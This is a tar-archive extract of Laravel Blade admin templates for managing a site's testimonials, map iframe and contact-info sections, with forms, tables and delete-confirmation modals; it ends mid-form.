}} </button> <div class="dropdown-menu"> <a class="dropdown-item" href="{{ route('testimonial.create', ['style' => 'style1']) }}">{{ __('content.style1') }}</a> </div> </div> <!-- Button --> <a id="hoverButton" class="iyzi-btn"><i class="fas fa-camera"></i> {{ __('content.view_draft') }}</a> <!-- Modal --> <div id="imageModal" class="border border-success iyzi-modal"> <img class="img-fluid " src="{{ asset('uploads/img/dummy/style/testimonial-'.$style.'.jpg') }}" alt="draft image"> </div> </h6> <div> <button type="button" class="btn btn-primary mb-3 mr-2" data-toggle="modal" data-target="#testimonialSectionModal">{{ __('content.section_title_and_description') }}</button> <button type="button" class="btn btn-primary mb-3" data-toggle="modal" data-target="#testimonialModal">+ {{ __('content.add_testimonial') }}</button> </div> </div> @if (count($items) > 0) <div> <input id="check_all" type="checkbox" onclick="showHideDeleteButton(this)"> <label for="check_all">{{ __('content.all') }}</label> <a id="deleteChecked" class="ml-2" href="#" data-toggle="modal" data-target="#deleteCheckedModal"> <i class="fa fa-trash text-danger font-18"></i> </a> </div> @if ($demo_mode == "on") <!-- Include Alert Blade --> @include('admin.demo_mode.demo-mode') @else <form onsubmit="return btnCheckListGet()" action="{{ route('testimonial.destroy_checked') }}" method="POST"> @method('DELETE') @csrf @endif <input type="hidden" id="checked_lists" name="checked_lists" value=""> <!-- Modal --> <div class="modal fade" id="deleteCheckedModal" tabindex="-1" role="dialog" aria-labelledby="deleteCheckedModalCenterTitle" aria-hidden="true"> <div class="modal-dialog modal-dialog-centered modal-sm" role="document"> <div class="modal-content"> <div class="modal-header"> <h5 class="modal-title" id="deleteCheckedModalCenterTitle">{{ __('content.delete') }}</h5> <button type="button" class="close" data-dismiss="modal" aria-label="{{ __('content.close') }}"> <span aria-hidden="true">×</span> </button> </div> <div class="modal-body text-center"> {{ __('content.delete_selected') }} </div> <div class="modal-footer"> <button type="button" class="btn btn-danger" data-dismiss="modal">{{ __('content.cancel') }}</button> <button onclick="btnCheckListGet()" type="submit" class="btn btn-success">{{ __('content.yes_delete_it') }}</button> </div> </div> </div> </div> </form> <table id="basic-datatable" class="table table-striped dt-responsive w-100"> <thead> <tr> <th scope="col">#</th> <th>{{ __('content.image') }}</th> <th>{{ __('content.name') }}</th> <th>{{ __('content.job') }}</th> <th>{{ __('content.description') }}</th> <th>{{ __('content.order') }}</th> <th class="custom-width-action">{{ __('content.action') }}</th> </tr> </thead> <tbody> @php $desc = count($items); $asc=0; @endphp @foreach ($items as $item) <tr> <td> <input name="check_list[]" type="checkbox" value="{{ $item->id }}" onclick="showHideDeleteButton2(this)"> <span class="d-none">{{ $asc++ }}{{ $desc-- }}</span> </td> <td> @if (!empty($item->section_image)) <img class="image-size img-fluid" src="{{ asset('uploads/img/testimonial/'.$item->section_image) }}" alt="testimonial image"> @else <img class="image-size img-fluid" src="{{ asset('uploads/img/dummy/no-image.jpg') }}" alt="no image"> @endif </td> <td>{{ $item->name }}</td> <td>{{ $item->job }}</td> <td>{{ $item->description }}</td> <td>{{ $item->order }}</td> <td> <div> <a href="{{ route('testimonial.edit', $item->id) }}" class="mr-2"> <i class="fa fa-edit text-info font-18"></i> </a> <a href="#" data-toggle="modal" data-target="#deleteModal{{ $item->id }}"> <i class="fa fa-trash text-danger font-18"></i> </a> </div> </td> </tr> <!-- Modal --> <div class="modal fade" id="deleteModal{{ $item->id }}" tabindex="-1" role="dialog" aria-labelledby="testimonialModalCenterTitle" aria-hidden="true"> <div class="modal-dialog modal-dialog-centered modal-sm" role="document"> <div class="modal-content"> <div class="modal-header"> <h5 class="modal-title" id="testimonialModalCenterTitle">{{ __('content.delete') }}</h5> <button type="button" class="close" data-dismiss="modal" aria-label="{{ __('content.close') }}"> <span aria-hidden="true">×</span> </button> </div> <div class="modal-body text-center"> {{ __('content.you_wont_be_able_to_revert_this') }} </div> <div class="modal-footer"> @if ($demo_mode == "on") <!-- Include Alert Blade --> @include('admin.demo_mode.demo-mode') @else <form class="d-inline-block" action="{{ route('testimonial.destroy', $item->id) }}" method="POST"> @method('DELETE') @csrf @endif <button type="button" class="btn btn-danger" data-dismiss="modal">{{ __('content.cancel') }}</button> <button type="submit" class="btn btn-success">{{ __('content.yes_delete_it') }}</button> </form> </div> </div> </div> </div> @endforeach </tbody> </table> @else <span>{{ __('content.not_yet_created') }}</span> @endif </div> <!-- end card body--> </div> <!-- end card --> </div><!-- end col--> </div><!-- end row--> <div class="modal fade" id="testimonialSectionModal" tabindex="-1" role="dialog" aria-labelledby="testimonialSectionModalLabel" aria-modal="false"> <div class="modal-dialog modal-md"> <div class="modal-content"> <div class="modal-header"> <h5 class="modal-title mt-0 font-16" id="testimonialSectionModalLabel">{{ __('content.section_title_and_description') }}</h5> <button type="button" class="close" data-dismiss="modal" aria-hidden="true">×</button> </div> <div class="modal-body"> @if (isset($item_section)) @if ($demo_mode == "on") <!-- Include Alert Blade --> @include('admin.demo_mode.demo-mode') @else <form action="{{ route('testimonial-section.update', $item_section->id) }}" method="POST" enctype="multipart/form-data"> @method('PUT') @csrf @endif <input type="hidden" name="style" value="{{ $style }}"> <div class="row"> <div class="col-md-12"> <div class="form-group"> <label for="section_title">{{ __('content.section_title') }}</label> <input type="text" name="section_title" class="form-control" id="section_title" value="{{ $item_section->section_title }}"> <small class="form-text text-muted">{{ __('content.recommended_tags') }} <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('a', 'section_title')">{{ __('<a href="">') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('br', 'section_title')">{{ __('<br>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('b', 'section_title')">{{ __('<b>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('i', 'section_title')">{{ __('<i>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('span', 'section_title')">{{ __('<span>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('p', 'section_title')">{{ __('<p>') }}</small> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="title">{{ __('content.title') }}</label> <input type="text" name="title" class="form-control" id="title" value="{{ $item_section->title }}"> <small class="form-text text-muted">{{ __('content.recommended_tags') }} <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('a', 'title')">{{ __('<a href="">') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('br', 'title')">{{ __('<br>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('b', 'title')">{{ __('<b>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('i', 'title')">{{ __('<i>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('span', 'title')">{{ __('<span>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('p', 'title')">{{ __('<p>') }}</small> </div> </div> </div> <button type="submit" class="btn btn-sm btn-primary mr-2">{{ __('content.submit') }}</button> <a href="#" class="btn btn-sm btn-primary" data-toggle="modal" data-target="#testimonialSectionDestroyModal{{ $item_section->id }}"> <i class="fa fa-trash"></i> {{ __('content.reset') }} </a> </form> <!-- Modal --> <div class="modal fade" id="testimonialSectionDestroyModal{{ $item_section->id }}" tabindex="-1" role="dialog" aria-labelledby="testimonialSectionDestroyModalCenterTitle" aria-hidden="true"> <div class="modal-dialog modal-dialog-centered modal-sm" role="document"> <div class="modal-content"> <div class="modal-header"> <h5 class="modal-title" id="testimonialSectionDestroyModalCenterTitle">{{ __('content.delete') }}</h5> <button type="button" class="close" data-dismiss="modal" aria-label="{{ __('content.close') }}"> <span aria-hidden="true">×</span> </button> </div> <div class="modal-body text-center"> {{ __('content.you_wont_be_able_to_revert_this') }} </div> <div class="modal-footer"> <form class="d-inline-block" action="{{ route('testimonial-section.destroy', $item_section->id) }}" method="POST"> @method('DELETE') @csrf <button type="button" class="btn btn-danger" data-dismiss="modal">{{ __('content.cancel') }}</button> <button type="submit" class="btn btn-success">{{ __('content.yes_delete_it') }}</button> </form> </div> </div> </div> </div> @else @if ($demo_mode == "on") <!-- Include Alert Blade --> @include('admin.demo_mode.demo-mode') @else <form action="{{ route('testimonial-section.store') }}" method="POST" enctype="multipart/form-data"> @csrf @endif <input type="hidden" name="style" value="{{ $style }}"> <div class="row"> <div class="col-md-12"> <div class="form-group"> <label for="section_title">{{ __('content.section_title') }} </label> <input type="text" name="section_title" class="form-control" id="section_title"> <small class="form-text text-muted">{{ __('content.recommended_tags') }} <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('a', 'section_title')">{{ __('<a href="">') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('br', 'section_title')">{{ __('<br>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('b', 'section_title')">{{ __('<b>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('i', 'section_title')">{{ __('<i>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('span', 'section_title')">{{ __('<span>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('p', 'section_title')">{{ __('<p>') }}</small> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="title">{{ __('content.title') }}</label> <input type="text" name="title" class="form-control" id="title"> <small class="form-text text-muted">{{ __('content.recommended_tags') }} <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('a', 'title')">{{ __('<a href="">') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('br', 'title')">{{ __('<br>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('b', 'title')">{{ __('<b>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('i', 'title')">{{ __('<i>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('span', 'title')">{{ __('<span>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('p', 'title')">{{ __('<p>') }}</small> </div> </div> </div> <button type="submit" class="btn btn-sm btn-primary">{{ __('content.submit') }}</button> </form> @endif </div> </div><!-- /.modal-content --> </div><!-- /.modal-dialog --> </div><!-- /.modal --> <div class="modal fade" id="testimonialModal" tabindex="-1" role="dialog" aria-labelledby="testimonialModalLabel" aria-modal="false"> <div class="modal-dialog modal-md"> <div class="modal-content"> <div class="modal-header"> <h5 class="modal-title mt-0 font-16" id="testimonialModalLabel">{{ __('content.add_new') }}</h5> <button type="button" class="close" data-dismiss="modal" aria-hidden="true">×</button> </div> <div class="modal-body"> @if ($demo_mode == "on") <!-- Include Alert Blade --> @include('admin.demo_mode.demo-mode') @else <form action="{{ route('testimonial.store') }}" method="POST" enctype="multipart/form-data"> @csrf @endif <input type="hidden" name="style" value="{{ $style }}"> <div class="row"> <div class="col-md-12"> <div class="form-group"> <label for="section_image">{{ __('content.image') }} ({{ __('content.size') }} 80 x 80) (.svg, .jpg, .jpeg, .png, .webp, .gif)</label> <input type="file" name="section_image" class="form-control-file" id="section_image"> <small class="form-text text-muted">{{ __('content.please_use_recommended_sizes') }}</small> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="name">{{ __('content.name') }}</label> <input type="text" name="name" class="form-control" id="name"> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="job">{{ __('content.job') }}</label> <input type="text" name="job" class="form-control" id="job"> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="description">{{ __('content.description') }}</label> <textarea name="description" class="form-control" id="description" rows="3"></textarea> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="star" class="col-form-label">{{ __('content.star') }}</label> <select name="star" class="form-control" id="star"> <option value="5" selected>{{ __('content.select_your_option') }}</option> <option value="1">1</option> <option value="2">2</option> <option value="3">3</option> <option value="4">4</option> <option value="5">5</option> </select> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="order">{{ __('content.order') }}</label> <input type="number" name="order" class="form-control" id="order" value="0" required> </div> </div> </div> <button type="submit" class="btn btn-sm btn-primary">{{ __('content.submit') }}</button> </form> </div> </div><!-- /.modal-content --> </div><!-- /.modal-dialog --> </div><!-- /.modal --> @endsection ���������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������views/admin/sections/testimonial/edit.blade.php�����������������������������������������������������0000644�����������������00000021416�14765366573�0015706 0����������������������������������������������������������������������������������������������������ustar�00�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������@extends('layouts.admin.master') @section('content') <!-- Form row --> <div class="row"> <div class="col-xl-12 box-margin height-card"> <div class="card card-body"> <div class="d-md-flex justify-content-between align-items-center mb-20"> <h4 class="card-title">{{ __('content.edit_testimonial') }} <!-- Button --> <a id="hoverButton" class="iyzi-btn"><i class="fas fa-camera"></i> {{ __('content.view_draft') }}</a> <!-- Modal --> <div id="imageModal" class="border border-success iyzi-modal"> <img class="img-fluid " src="{{ asset('uploads/img/dummy/style/testimonial-style1.jpg') }}" alt="draft image"> </div> </h4> <div> <a href="{{ url()->previous() }}" class="btn btn-primary"><i class="fas fa-angle-left"></i> {{ __('content.back') }}</a> </div> </div> @if ($demo_mode == "on") <!-- Include Alert Blade --> @include('admin.demo_mode.demo-mode') @else <form action="{{ route('testimonial.update', $item->id) }}" method="POST" enctype="multipart/form-data"> @method('PUT') @csrf @endif <input type="hidden" name="style" value="{{ $item->style }}"> <div class="row"> <div class="col-md-12"> <div class="form-group"> <label for="section_image">{{ __('content.image') }} ({{ __('content.size') }} 80 x 80) (.svg, .jpg, .jpeg, .png, .webp)</label> <input type="file" name="section_image" class="form-control-file" id="section_image"> <small class="form-text text-muted">{{ __('content.please_use_recommended_sizes') }}</small> </div> <div class="height-card box-margin"> <div class="card"> <div class="card-body"> <div class="avatar-area text-center"> <div class="media"> @if (!empty($item->section_image)) <a class="d-block mx-auto" href="#" data-toggle="tooltip" data-placement="top" data-original-title="{{ __('content.current_image') }}"> <img src="{{ asset('uploads/img/testimonial/'.$item->section_image) }}" alt="testimonial image" class="rounded w-25"> </a> @else <a class="d-block mx-auto" href="#" data-toggle="tooltip" data-placement="top" data-original-title="{{ __('content.current_image') }}"> <img src="{{ asset('uploads/img/dummy/no-image.jpg') }}" alt="no image" class="rounded w-25"> </a> @endif </div> @if (!empty($item->section_image)) <a class="mt-3 d-block" href="#" data-toggle="modal" data-target="#deleteModal{{ $item->id }}"> <i class="fa fa-trash text-danger font-18"></i> </a> @endif </div> <!--end card-body--> </div> </div> <!--end card--> </div> <!--end col--> </div> <div class="col-md-12"> <div class="form-group"> <label for="name">{{ __('content.name') }} </label> <input type="text" name="name" class="form-control" id="name" value="{{ $item->name }}"> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="job">{{ __('content.job') }} </label> <input type="text" name="job" class="form-control" id="job" value="{{ $item->job }}"> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="description">{{ __('content.description') }} </label> <textarea type="text" name="description" class="form-control" id="description" rows="3">{{ $item->description }}</textarea> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="star" class="col-form-label">{{ __('content.star') }}</label> <select class="form-control" name="star" id="star"> <option value="5" selected>{{ __('content.select_your_option') }}</option> <option value="1" {{ $item->star == 1 ? 'selected' : '' }}>1</option> <option value="2" {{ $item->star == 2 ? 'selected' : '' }}>2</option> <option value="3" {{ $item->star == 3 ? 'selected' : '' }}>3</option> <option value="4" {{ $item->star == 4 ? 'selected' : '' }}>4</option> <option value="5" {{ $item->star == 5 ? 'selected' : '' }}>5</option> </select> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="order">{{ __('content.order') }}</label> <input type="number" name="order" class="form-control" id="order" value="{{ $item->order }}"> </div> </div> <div class="col-md-12"> <button type="submit" class="btn btn-primary mr-2">{{ __('content.submit') }}</button> </div> </div> </form> <!-- Modal --> <div class="modal fade" id="deleteModal{{ $item->id }}" tabindex="-1" role="dialog" aria-labelledby="messageModalCenterTitle" aria-hidden="true"> <div class="modal-dialog modal-dialog-centered modal-sm" role="document"> <div class="modal-content"> <div class="modal-header"> <h5 class="modal-title" id="messageModalCenterTitle">{{ __('content.delete') }}</h5> <button type="button" class="close" data-dismiss="modal" aria-label="{{ __('content.close') }}"> <span aria-hidden="true">×</span> </button> </div> <div class="modal-body text-center"> {{ __('content.you_wont_be_able_to_revert_this') }} </div> <div class="modal-footer"> <form class="d-inline-block" action="{{ route('testimonial.destroy_image', $item->id) }}" method="POST"> @method('DELETE') @csrf <button type="button" class="btn btn-danger" data-dismiss="modal">{{ __('content.cancel') }}</button> <button type="submit" class="btn btn-success">{{ __('content.yes_delete_it') }}</button> </form> </div> </div> </div> </div> </div> </div> </div> <!-- end row --> @endsection ��������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������views/admin/sections/map/create.blade.php�����������������������������������������������������������0000644�����������������00000004753�14765366573�0014456 0����������������������������������������������������������������������������������������������������ustar�00�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������@extends('layouts.admin.master') @section('content') <!-- Form row --> <div class="row"> <div class="col-xl-12 box-margin height-card"> <div class="card card-body"> <h4 class="card-title">{{ __('content.map') }}</h4> @if (isset($map)) <form action="{{ route('map.update', $map->id) }}" method="POST"> @method('PUT') @csrf <div class="row"> <div class="col-md-12"> <div class="form-group"> <label for="map_iframe" data-toggle="tooltip" title="{{ __('content.map_iframe_desc_placeholder') }}">{{ __('content.map_iframe') }}</label> <textarea name="map_iframe" class="form-control" id="map_iframe" rows="3">{{ $map->map_iframe }}</textarea> <small class="form-text text-muted">{{ __('content.map_iframe_desc_placeholder') }}</small> </div> </div> <div class="col-md-12"> <button type="submit" class="btn btn-primary mr-2">{{ __('content.submit') }}</button> </div> </div> </form> @else <form action="{{ route('map.store') }}" method="POST"> @csrf <div class="row"> <div class="col-md-12"> <div class="form-group"> <label for="map_iframe" data-toggle="tooltip" title="{{ __('content.map_iframe_desc_placeholder') }}">{{ __('content.map_iframe') }}</label> <textarea name="map_iframe" class="form-control" id="map_iframe" rows="3"></textarea> <small class="form-text text-muted">{{ __('content.map_iframe_desc_placeholder') }}</small> </div> </div> <div class="col-md-12"> <button type="submit" class="btn btn-primary mr-2">{{ __('content.submit') }}</button> </div> </div> </form> @endif </div> </div> </div> <!-- end row --> @endsection ���������������������views/admin/sections/contact_info/create.blade.php��������������������������������������������������0000644�����������������00000072405�14765366573�0016346 0����������������������������������������������������������������������������������������������������ustar�00�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������@extends('layouts.admin.master') @section('content') <div class="row"> <div class="col-12 box-margin"> <div class="card"> <div class="card-body"> <div class="d-md-flex justify-content-between align-items-center mb-20"> <h4 class="card-title mb-0">{{ __('content.contact_info') }} <div class="btn-group"> <button type="button" class="btn btn-primary btn-sm dropdown-toggle" data-toggle="dropdown" aria-haspopup="true" aria-expanded="false"> {{ __('content.'.$style) }} </button> <div class="dropdown-menu"> <a class="dropdown-item" href="{{ route('contact-info.create', ['style' => 'style1']) }}">{{ __('content.style1') }}</a> </div> </div> <!-- Button --> <a id="hoverButton" class="iyzi-btn"><i class="fas fa-camera"></i> {{ __('content.view_draft') }}</a> <!-- Modal --> <div id="imageModal" class="border border-success iyzi-modal"> <img class="img-fluid " src="{{ asset('uploads/img/dummy/style/contact-'.$style.'.jpg') }}" alt="draft image"> </div> </h4> <div> <button type="button" class="btn btn-primary mb-3 mr-2" data-toggle="modal" data-target="#contactInfoSectionModal">{{ __('content.section_title_and_description') }}</button> <button type="button" class="btn btn-primary mb-3" data-toggle="modal" data-target="#contactInfoModal">+ {{ __('content.add_contact_info') }}</button> </div> </div> @if (count($items) > 0) <div class="mr-3"> <input id="check_all" type="checkbox" onclick="showHideDeleteButton(this)"> <label for="check_all">{{ __('content.all') }}</label> <a id="deleteChecked" class="ml-2" href="#" data-toggle="modal" data-target="#deleteCheckedModal"> <i class="fa fa-trash text-danger font-18"></i> </a> </div> @if ($demo_mode == "on") <!-- Include Alert Blade --> @include('admin.demo_mode.demo-mode') @else <form onsubmit="return btnCheckListGet()" action="{{ route('feature.destroy_checked') }}" method="POST"> @method('DELETE') @csrf @endif <input type="hidden" id="checked_lists" name="checked_lists" value=""> <!-- Modal --> <div class="modal fade" id="deleteCheckedModal" tabindex="-1" role="dialog" aria-labelledby="deleteCheckedModalCenterTitle" aria-hidden="true"> <div class="modal-dialog modal-dialog-centered modal-sm" role="document"> <div class="modal-content"> <div class="modal-header"> <h5 class="modal-title" id="deleteCheckedModalCenterTitle">{{ __('content.delete') }}</h5> <button type="button" class="close" data-dismiss="modal" aria-label="{{ __('content.close') }}"> <span aria-hidden="true">×</span> </button> </div> <div class="modal-body text-center"> {{ __('content.delete_selected') }} </div> <div class="modal-footer"> <button type="button" class="btn btn-danger" data-dismiss="modal">{{ __('content.cancel') }}</button> <button onclick="btnCheckListGet()" type="submit" class="btn btn-success">{{ __('content.yes_delete_it') }}</button> </div> </div> </div> </div> </form> <table id="basic-datatable" class="table table-striped dt-responsive w-100"> <thead> <tr> <th scope="col">#</th> <th>{{ __('content.title') }}</th> <th>{{ __('content.description') }}</th> <th>{{ __('content.order') }}</th> <th class="custom-width-action">{{ __('content.action') }}</th> </tr> </thead> <tbody> @php $desc = count($items); $asc=0; @endphp @foreach ($items as $item) <tr> <td> <input name="check_list[]" type="checkbox" value="{{ $item->id }}" onclick="showHideDeleteButton2(this)"> <span class="d-none">{{ $asc++ }}{{ $desc-- }}</span> </td> <td>{{ $item->title }}</td> <td>{{ $item->description }}</td> <td>{{ $item->order }}</td> <td> <div> <a href="{{ route('contact-info.edit', $item->id) }}" class="mr-2"> <i class="fa fa-edit text-info font-18"></i> </a> <a href="#" data-toggle="modal" data-target="#deleteModal{{ $item->id }}"> <i class="fa fa-trash text-danger font-18"></i> </a> </div> </td> </tr> <!-- Modal --> <div class="modal fade" id="deleteModal{{ $item->id }}" tabindex="-1" role="dialog" aria-labelledby="contactInfoModalCenterTitle" aria-hidden="true"> <div class="modal-dialog modal-dialog-centered modal-sm" role="document"> <div class="modal-content"> <div class="modal-header"> <h5 class="modal-title" id="contactInfoModalCenterTitle">{{ __('content.delete') }}</h5> <button type="button" class="close" data-dismiss="modal" aria-label="{{ __('content.close') }}"> <span aria-hidden="true">×</span> </button> </div> <div class="modal-body text-center"> {{ __('content.you_wont_be_able_to_revert_this') }} </div> <div class="modal-footer"> @if ($demo_mode == "on") <!-- Include Alert Blade --> @include('admin.demo_mode.demo-mode') @else <form class="d-inline-block" action="{{ route('contact-info.destroy', $item->id) }}" method="POST"> @method('DELETE') @csrf @endif <button type="button" class="btn btn-danger" data-dismiss="modal">{{ __('content.cancel') }}</button> <button type="submit" class="btn btn-success">{{ __('content.yes_delete_it') }}</button> </form> </div> </div> </div> </div> @endforeach </tbody> </table> @else <span>{{ __('content.not_yet_created') }}</span> @endif </div> <!-- end card body--> </div> <!-- end card --> </div><!-- end col--> </div><!-- end row--> <div class="modal fade" id="contactInfoSectionModal" tabindex="-1" role="dialog" aria-labelledby="contactInfoSectionModalLabel" aria-modal="false"> <div class="modal-dialog modal-md"> <div class="modal-content"> <div class="modal-header"> <h5 class="modal-title mt-0 font-16" id="contactInfoSectionModalLabel">{{ __('content.section_title_and_description') }}</h5> <button type="button" class="close" data-dismiss="modal" aria-hidden="true">×</button> </div> <div class="modal-body"> @if (isset($item_section)) @if ($demo_mode == "on") <!-- Include Alert Blade --> @include('admin.demo_mode.demo-mode') @else <form action="{{ route('contact-info-section.update', $item_section->id) }}" method="POST" enctype="multipart/form-data"> @method('PUT') @csrf @endif <input type="hidden" name="style" value="{{ $style }}"> <div class="row"> <div class="col-md-12"> <div class="form-group"> <label for="section_title">{{ __('content.section_title') }}</label> <input type="text" name="section_title" class="form-control" id="section_title" value="{{ $item_section->section_title }}"> <small class="form-text text-muted">{{ __('content.recommended_tags') }} <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('a', 'section_title')">{{ __('<a href="">') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('br', 'section_title')">{{ __('<br>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('b', 'section_title')">{{ __('<b>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('i', 'section_title')">{{ __('<i>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('span', 'section_title')">{{ __('<span>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('p', 'section_title')">{{ __('<p>') }}</span> </small> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="title">{{ __('content.title') }}</label> <input type="text" name="title" class="form-control" id="title" value="{{ $item_section->title }}"> <small class="form-text text-muted">{{ __('content.recommended_tags') }} <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('a', 'title')">{{ __('<a href="">') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('br', 'title')">{{ __('<br>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('b', 'title')">{{ __('<b>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('i', 'title')">{{ __('<i>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('span', 'title')">{{ __('<span>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('p', 'title')">{{ __('<p>') }}</span> </small> </div> </div> </div> <button type="submit" class="btn btn-sm btn-primary mr-2">{{ __('content.submit') }}</button> <a href="#" class="btn btn-sm btn-primary" data-toggle="modal" data-target="#contactInfoSectionDestroyModal{{ $item_section->id }}"> <i class="fa fa-trash"></i> {{ __('content.reset') }} </a> </form> <!-- Modal --> <div class="modal fade" id="contactInfoSectionDestroyModal{{ $item_section->id }}" tabindex="-1" role="dialog" aria-labelledby="contactInfoSectionDestroyModalCenterTitle" aria-hidden="true"> <div class="modal-dialog modal-dialog-centered modal-sm" role="document"> <div class="modal-content"> <div class="modal-header"> <h5 class="modal-title" id="contactInfoSectionDestroyModalCenterTitle">{{ __('content.delete') }}</h5> <button type="button" class="close" data-dismiss="modal" aria-label="{{ __('content.close') }}"> <span aria-hidden="true">×</span> </button> </div> <div class="modal-body text-center"> {{ __('content.you_wont_be_able_to_revert_this') }} </div> <div class="modal-footer"> <form class="d-inline-block" action="{{ route('contact-info-section.destroy', $item_section->id) }}" method="POST"> @method('DELETE') @csrf <button type="button" class="btn btn-danger" data-dismiss="modal">{{ __('content.cancel') }}</button> <button type="submit" class="btn btn-success">{{ __('content.yes_delete_it') }}</button> </form> </div> </div> </div> </div> @else @if ($demo_mode == "on") <!-- Include Alert Blade --> @include('admin.demo_mode.demo-mode') @else <form action="{{ route('contact-info-section.store') }}" method="POST" enctype="multipart/form-data"> @csrf @endif <input type="hidden" name="style" value="{{ $style }}"> <div class="row"> <div class="col-md-12"> <div class="form-group"> <label for="section_title">{{ __('content.section_title') }} </label> <input type="text" name="section_title" class="form-control" id="section_title"> <small class="form-text text-muted">{{ __('content.recommended_tags') }} <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('a', 'section_title')">{{ __('<a href="">') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('br', 'section_title')">{{ __('<br>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('b', 'section_title')">{{ __('<b>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('i', 'section_title')">{{ __('<i>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('span', 'section_title')">{{ __('<span>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('p', 'section_title')">{{ __('<p>') }}</span> </small> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="title">{{ __('content.title') }} </label> <input type="text" name="title" class="form-control" id="title"> <small class="form-text text-muted">{{ __('content.recommended_tags') }} <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('a', 'title')">{{ __('<a href="">') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('br', 'title')">{{ __('<br>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('b', 'title')">{{ __('<b>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('i', 'title')">{{ __('<i>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('span', 'title')">{{ __('<span>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('p', 'title')">{{ __('<p>') }}</span> </small> </div> </div> </div> <button type="submit" class="btn btn-sm btn-primary">{{ __('content.submit') }}</button> </form> @endif </div> </div><!-- /.modal-content --> </div><!-- /.modal-dialog --> </div><!-- /.modal --> <div class="modal fade" id="contactInfoModal" tabindex="-1" role="dialog" aria-labelledby="contactInfoModalLabel" aria-modal="false"> <div class="modal-dialog modal-md"> <div class="modal-content"> <div class="modal-header"> <h5 class="modal-title mt-0 font-16" id="contactInfoModalLabel">{{ __('content.add_new') }}</h5> <button type="button" class="close" data-dismiss="modal" aria-hidden="true">×</button> </div> <div class="modal-body"> @if ($demo_mode == "on") <!-- Include Alert Blade --> @include('admin.demo_mode.demo-mode') @else <form action="{{ route('contact-info.store') }}" method="POST" enctype="multipart/form-data"> @csrf @endif <input name="style" type="hidden" value="{{ $style }}"> <div class="row"> <div class="col-md-12"> <div class="single-clint-area-content"> <fieldset class="form-group"> <legend class="font-14">{{ __('content.type') }}</legend> <div class="form-check pl-0 mb-2"> <label class="form-check-label"> <input type="radio" class="form-check-input mr-2" 